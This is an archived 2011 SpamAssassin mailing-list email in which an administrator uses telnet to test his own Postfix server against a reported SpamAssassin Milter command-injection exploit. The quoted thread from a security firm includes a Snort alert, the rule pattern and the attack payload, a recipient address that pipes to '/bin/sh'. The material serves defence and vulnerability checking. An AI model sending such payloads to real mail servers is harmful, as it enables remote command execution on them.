Return-Path: Delivered-To: apmail-spamassassin-users-archive@www.apache.org Received: (qmail 21493 invoked from network); 10 Feb 2011 22:11:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (140.211.11.3) by minotaur.apache.org with SMTP; 10 Feb 2011 22:11:23 -0000 Received: (qmail 82970 invoked by uid 500); 10 Feb 2011 22:11:20 -0000 Delivered-To: apmail-spamassassin-users-archive@spamassassin.apache.org Received: (qmail 81960 invoked by uid 500); 10 Feb 2011 22:11:19 -0000 Mailing-List: contact users-help@spamassassin.apache.org; run by ezmlm Precedence: bulk list-help: list-unsubscribe: List-Post: List-Id: Delivered-To: mailing list users@spamassassin.apache.org Received: (qmail 81953 invoked by uid 99); 10 Feb 2011 22:11:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (140.211.11.136) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 10 Feb 2011 22:11:19 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of junk4@klunky.co.uk designates 62.58.61.184 as permitted sender) Received: from [62.58.61.184] (HELO klunky.co.uk) (62.58.61.184) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 10 Feb 2011 22:11:14 +0000 Received: from [10.90.90.100] (ip52-139-173-82.adsl2.static.versatel.nl [82.173.139.52]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by klunky.co.uk (Postfix) with ESMTPSA id C2E8280082; Thu, 10 Feb 2011 23:10:51 +0100 (CET) DKIM-Signature: v=1; a=rsa-sha256; c=simple/simple; d=klunky.co.uk; s=default; t=1297375852; bh=LFoj3DbZO+hkq3mMKqLVg3tlTs48kTsQqVopPXT+dds=; h=Message-ID:Date:From:MIME-Version:To:CC:Subject:References: In-Reply-To:Content-Type:Content-Transfer-Encoding; b=D8Oz5WarIPLP5TAkQAZLZtJ70LT7K1MI9GRWNBrV1F1+eOXHyyHsCzSBMiYKJaoMv o2gZRMJM6GaWr3DyBoiqotxxoR3xy1Xp83McTgHNUYwLDp2OU4I5/5tpUYzyk0hMbF Iies21J2d9qBQRNnKMftgp3J83HY1/5PYfGNBx7c= Message-ID: <4D54626B.6050808@klunky.co.uk> Date: Thu, 10 Feb 2011 23:10:51 +0100 From: JKL User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101208 Lightning/1.0b2 Thunderbird/3.1.7 MIME-Version: 1.0 To: Michael Scheidell CC: SpamAssassin Users List , "amavis-user@lists.sourceforge.net" , John Meyer Subject: Re: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt References: <4D542390.5080106@secnap.com> In-Reply-To: <4D542390.5080106@secnap.com> Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on logout.klunky.co.uk X-Old-Spam-Status: No, score=-1.0 required=6.0 tests=ALL_TRUSTED shortcircuit=no autolearn=ham version=3.3.1 Hi, Seems ok with postfix unless I missed something, which is possible. $ telnet klunky.co.uk 25 Trying 62.58.61.184... Connected to logout.klunky.co.uk. Escape character is '^]'. 220 klunky.co.uk ESMTP Postfix ehlo klunky.co.uk 250-klunky.co.uk 250-PIPELINING 250-SIZE 20480000 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN MAIL FROM: 250 2.1.0 Ok RCPT TO:root+:"|touch /tmp/foo" 501 5.1.3 Bad recipient address syntax RCPT TO: 550 5.1.0 : Sender address rejected: User unknown in virtual mailbox table RCPT TO: 501 5.1.3 Bad recipient address syntax rcpt to: root+:"|exec /bin/sh 0&0 2>&0" 501 5.1.3 Bad recipient address syntax rcpt to:&0 2>&0"> 250 2.1.5 Ok data 354 End data with . . qu250 2.0.0 Ok: queued as 24E96819DF 502 5.5.2 Error: command not recognized it 221 2.0.0 Bye Connection closed by foreign host. $ telnet klunky.co.uk 25 Trying 62.58.61.184... Connected to logout.klunky.co.uk. Escape character is '^]'. 220 klunky.co.uk ESMTP Postfix ehlo klunky.co.uk 250-klunky.co.uk 250-PIPELINING 250-SIZE 20480000 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN MAIL FROM: 250 2.1.0 Ok rcpt to:&0 2>&0"> 550 5.1.0 : Sender address rejected: User unknown in virtual mailbox table quit 221 2.0.0 Bye Connection closed by foreign host. $ telnet klunky.co.uk 25 Trying 62.58.61.184... Connected to logout.klunky.co.uk. Escape character is '^]'. 220 klunky.co.uk ESMTP Postfix ehlo klunky.co.uk 250-klunky.co.uk 250-PIPELINING 250-SIZE 20480000 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN MAIL FROM: 250 2.1.0 Ok rcpt to:&0 2>&0"> 550 5.1.0 : Sender address rejected: User unknown in virtual mailbox table quit 221 2.0.0 Bye Connection closed by foreign host. On 02/10/2011 06:42 PM, Michael Scheidell wrote: > heads up: > > if case you are using spamassassin milter: > > active exploits going on. > > > > > Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1 > > I don't see anything on bugtraq about a fix. > > > -------- Original Message -------- > Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin > Milter Plugin Remote Arbitrary Command Injection Attempt > > > > > > > > > > > > The rule is only looking for this: > > content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; > > > > Personally, I would probably block it. Although, if we’re not seeing > this sort of thing pop up on customer’s boxes, a manual block in > scanner2 is sufficient for now, right? > > > > Either way, let me know and I’ll block/unblock/leave alone. > > > > > > -- > > John Meyer > > Associate Security Engineer > > >|SECNAP Network Security > > Office: (561) 999-5000 x:1235 > > Direct: (561) 948-2264 > > > > *From:*Michael Scheidell > *Sent:* Thursday, February 10, 2011 12:25 PM > *To:* John Meyer > *Cc:* Jonathan Scheidell; Anthony Wetula > *Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin > Milter Plugin Remote Arbitrary Command Injection Attempt > > > > is the snort rule specific enough that you can block the offending ip > for 5 mins? > > (if its a real smtp server, it will retry) and legit email through. > > > > On 2/10/11 12:12 PM, John Meyer wrote: > > I don’t like the looks of this. I blocked that IP with samtool. > > > > Payload: > > > > rcpt to: root+:"|exec /bin/sh 0&0 2>&0" > > data > > . > > quit > > > > > > > > -- > > John Meyer > > Associate Security Engineer > > >|SECNAP Network Security > > Office: (561) 999-5000 x:1235 > > Direct: (561) 948-2264 > > > > *From:*SECNAP Network Security > *Sent:* Thursday, February 10, 2011 12:01 PM > *To:* security-alert@scanner2.secnap.com > *Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter > Plugin Remote Arbitrary Command Injection Attempt > > > > 02/10-12:00:59 TCP 62.206.228.188:56691 --> 10.70.1.33:25 > [1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote > Arbitrary Command Injection Attempt > [Classification: Attempted User Privilege Gain] [Priority: 1] > > > > -- > Michael Scheidell, CTO > o: 561-999-5000 > d: 561-948-2259 > ISN: 1259*1300 > >*| *SECNAP Network Security Corporation > > · Certified SNORT Integrator > > · 2008-9 Hot Company Award Winner, World Executive Alliance > > · Five-Star Partner Program 2009, VARBusiness > > · Best in Email Security,2010: Network Products Guide > > · King of Spam Filters, SC Magazine 2008 > > > ------------------------------------------------------------------------ > > This email has been scanned and certified safe by SpammerTrap®. > For Information please see http://www.secnap.com/products/spammertrap/ > > ------------------------------------------------------------------------ >